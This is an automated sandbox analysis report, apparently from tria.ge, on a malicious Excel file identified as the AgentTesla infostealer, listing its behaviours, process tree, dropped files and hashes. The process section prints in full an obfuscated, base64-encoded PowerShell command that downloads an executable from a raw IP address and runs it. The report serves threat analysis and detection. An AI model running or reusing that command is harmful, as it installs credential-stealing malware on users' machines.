Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    20/07/2024, 09:55

General

  • Target

    5bf939a5ebe508171529552a5d1495f495393ebb08eb87c08ac1f5fb9e0f941d.xls

  • Size

    118KB

  • MD5

    b363a9de28fa08d52fd1bcbe66b62177

  • SHA1

    4d76d82d397c088d68038414bcc945c7e62fef9f

  • SHA256

    5bf939a5ebe508171529552a5d1495f495393ebb08eb87c08ac1f5fb9e0f941d

  • SHA512

    ecbc3d03d4c30a1d85ecbde1fdbc262c41e90743117d9f407676eaf03ee61fdd227699e4b4adcbc0aa15856b1c85dee5f2fd66548aa96c9f56306da424fe670c

  • SSDEEP

    1536:HtZjb5CNvDUyPILbqcH1pxt3HrsbDMTXLMEBun3OJdvc3hZPGgqGa:HPj9cgBbq6xtXIbYwEQ3OnvWHPG

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Detected phishing page
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\5bf939a5ebe508171529552a5d1495f495393ebb08eb87c08ac1f5fb9e0f941d.xls
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3048
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2860
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C POWerSHElL -EX ByPASS -NOp -W 1 -c dEvIceCrEDENtIALDEPLoYmeNt ; iEx($(ieX('[System.TexT.EncOdInG]'+[CHaR]58+[CHAr]58+'UTf8.GETsTRInG([SySteM.conVErt]'+[cHAr]0X3A+[chAR]58+'froMbasE64sTRiNG('+[CHAR]0X22+'JG8wOVNaYiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZXJEZUZJTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElpU1Msc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtCcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb29PTE95Q0wsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZd2N2ZEVGWldDLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKcmRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJhUUFrbXpIRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzVEhRRm56RnpmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG8wOVNaYjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNC4xNzkvNTE1L3dpbml0aS5leGUiLCIkRU52OkFQUERBVEFcd2luaXRpLmV4ZSIsMCwwKTtTVGFyVC1zTGVFcCgzKTtzVGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdpbml0aS5leGUi'+[chAR]34+'))')))"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2772
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        POWerSHElL -EX ByPASS -NOp -W 1 -c dEvIceCrEDENtIALDEPLoYmeNt ; iEx($(ieX('[System.TexT.EncOdInG]'+[CHaR]58+[CHAr]58+'UTf8.GETsTRInG([SySteM.conVErt]'+[cHAr]0X3A+[chAR]58+'froMbasE64sTRiNG('+[CHAR]0X22+'JG8wOVNaYiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZXJEZUZJTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElpU1Msc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtCcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb29PTE95Q0wsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZd2N2ZEVGWldDLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKcmRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJhUUFrbXpIRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzVEhRRm56RnpmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG8wOVNaYjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNC4xNzkvNTE1L3dpbml0aS5leGUiLCIkRU52OkFQUERBVEFcd2luaXRpLmV4ZSIsMCwwKTtTVGFyVC1zTGVFcCgzKTtzVGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdpbml0aS5leGUi'+[chAR]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2636
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\8up2kuy1.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1588
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE9D3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE9D2.tmp"
            5⤵
              PID:1732
          • C:\Users\Admin\AppData\Roaming\winiti.exe
            "C:\Users\Admin\AppData\Roaming\winiti.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1044
            • C:\Users\Admin\AppData\Roaming\winiti.exe
              "C:\Users\Admin\AppData\Roaming\winiti.exe"
              5⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2432

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK27LCMU\bqrp4j[1].htm

      Filesize

      75B

      MD5

      f5aa5c15ce9558011d53a5b7700f8209

      SHA1

      082c8304d8093782c6036151672e903e0715a869

      SHA256

      8f2b99b41702d67ec68678a193cf21e7be375e6f8552b3673d4b8adf3cd86fe9

      SHA512

      530dc5cf8f0b5b2988aa35e91dc35995a434dc8e82bbacea5635c5cb876e0b8cc1596300327cf6d495acd27b10cc366c5ce152033aa9cb2d929efe5a7810805a

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z2D3H3V6\bqrp4j[1].htm

      Filesize

      168B

      MD5

      d57e3a550060f85d44a175139ea23021

      SHA1

      2c5cb3428a322c9709a34d04dd86fe7628f8f0a6

      SHA256

      43edf068d34276e8ade4113d4d7207de19fc98a2ae1c07298e593edae2a8774c

      SHA512

      0364fe6a010fce7a3f4a6344c84468c64b20fd131f3160fc649db78f1075ba52d8a1c4496e50dbe27c357e01ee52e94cdcda8f7927cba28d5f2f45b9da690063

    • C:\Users\Admin\AppData\Local\Temp\8up2kuy1.dll

      Filesize

      3KB

      MD5

      205e27169156054632cc11269357c59c

      SHA1

      c4c9b6100486e022c8778b71573c6621d21e1ed8

      SHA256

      ff5ba91a96c64607e62146c1cd4a2a7b66a0633b00e0ec8037603030feffcf12

      SHA512

      30f7939ce8377eb3cbc9b69fe665024f3c454a343bd5c5f96983ff41491b6224d46cfa47e3dd561ca5825a81854d187b41069dd08c9f84cce85fb4c051625505

    • C:\Users\Admin\AppData\Local\Temp\8up2kuy1.pdb

      Filesize

      7KB

      MD5

      2ec3684debec23ce3620a183635b6e1e

      SHA1

      83ee7ea91d4cb875f41e0806d085a7f313ea9b34

      SHA256

      6e6d1ece8e3d1495752af7121c0583a70c7c75f64a4f781b061313862e629751

      SHA512

      051867259773a466dd1837b07fc53d345d18bc24c7860bf718ef951266f6806758682c541282e48fd964be3385070c3a726935bb73699d5bd5b917de2119c0f4

    • C:\Users\Admin\AppData\Local\Temp\RESE9D3.tmp

      Filesize

      1KB

      MD5

      8c5ef15d9ff9a902c87ce02dc3b53bc8

      SHA1

      47e203a63ae42cc9e089babcad96c938232ffe7a

      SHA256

      5c70642b95a26f7d5bca2432ea24ee7b41f2eacbdab6a7ae0e303f9fbe2915aa

      SHA512

      5abde99629f366ac9315d174319498fb51e9dd856a7ff89fc7215b0f3e94c2dac402c510ad21bf0a2a4774e652863efa63aa51e68e517e4f57cf45d0a29b6162

    • C:\Users\Admin\AppData\Roaming\winiti.exe

      Filesize

      906KB

      MD5

      f077adcb2d6ea5208dc2b37f94d21fc8

      SHA1

      2fd52d3fb6b982bb64afd1165836f911ac82a40e

      SHA256

      6af79d96f93fecf5182be2b0dbadb8a0874fb4bcdded73478252ccec2f48f05f

      SHA512

      81a3b1416e9780b2c25ab381742ebac09200932d7b21fd8546f4d455439e5c1bbdac7c3faff9f48945064c04b941d1c237dba55d53687445d456a855bce0dd07

    • \??\c:\Users\Admin\AppData\Local\Temp\8up2kuy1.0.cs

      Filesize

      468B

      MD5

      7734075c50835dd0aa579997b1feacfd

      SHA1

      b2b42485dfcf88999d6780c0f1aa88e638081515

      SHA256

      9ef8ccd491530f4be74ad14c37d6c10b340045ac58c8bf65cc41c0766552a0e3

      SHA512

      0350ef6f6c01260409dbda7da5a3873b5ee760d02c93c98cb8b6415685b5a4d37013b5c0822e8b85a85b8d14df7224a9b9d3f7d1145330f795a7c9be682ae82e

    • \??\c:\Users\Admin\AppData\Local\Temp\8up2kuy1.cmdline

      Filesize

      309B

      MD5

      b8846de9d7dc1ad32e3cdd3b70cda506

      SHA1

      eaba4994e87638e36e64b1d8ae40ab82acc3de2e

      SHA256

      23679c623b8659c2300cbb1af381d95bbac3b204a3975c7c83ca44abc8d94f9a

      SHA512

      9f3d460b553826850a3ef2eed873f5529840878f7eba19bd12f2d7d0d3fc12a39cab1c93bf3f2a8ff4dcab6b62fce5c589ccfc30d953fc1c3fa9d2267a97620e

    • \??\c:\Users\Admin\AppData\Local\Temp\CSCE9D2.tmp

      Filesize

      652B

      MD5

      28fd46d577ed4f3e89d0718c11e4d23e

      SHA1

      0bdce8b570158912d1202cd7ae688d6a1a7e7235

      SHA256

      bc73dbc0d4d46ea14bd657a14561b06a6d3f8b1b89c3857fe80b96eab2bc78f7

      SHA512

      d80340864cbb27a0d6b9180d9955a66a09825dd7cb160058d4f832b74cc27465e9b4fb22346ec43df56644c7457d4aede85d13c03b56dc2e7d0f7d119c69ae89

    • memory/1044-53-0x00000000056C0000-0x0000000005790000-memory.dmp

      Filesize

      832KB

    • memory/1044-54-0x0000000000630000-0x000000000064A000-memory.dmp

      Filesize

      104KB

    • memory/1044-56-0x0000000005790000-0x0000000005814000-memory.dmp

      Filesize

      528KB

    • memory/1044-55-0x0000000000810000-0x000000000081E000-memory.dmp

      Filesize

      56KB

    • memory/1044-52-0x00000000008C0000-0x00000000009A8000-memory.dmp

      Filesize

      928KB

    • memory/2432-63-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2432-65-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

    • memory/2432-69-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2432-59-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2432-57-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2432-68-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2432-66-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2432-61-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2860-18-0x00000000022B0000-0x00000000022B2000-memory.dmp

      Filesize

      8KB

    • memory/3048-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/3048-19-0x00000000025F0000-0x00000000025F2000-memory.dmp

      Filesize

      8KB

    • memory/3048-1-0x000000007299D000-0x00000000729A8000-memory.dmp

      Filesize

      44KB

    • memory/3048-70-0x000000007299D000-0x00000000729A8000-memory.dmp

      Filesize

      44KB

    • memory/3048-73-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/3048-76-0x000000007299D000-0x00000000729A8000-memory.dmp

      Filesize

      44KB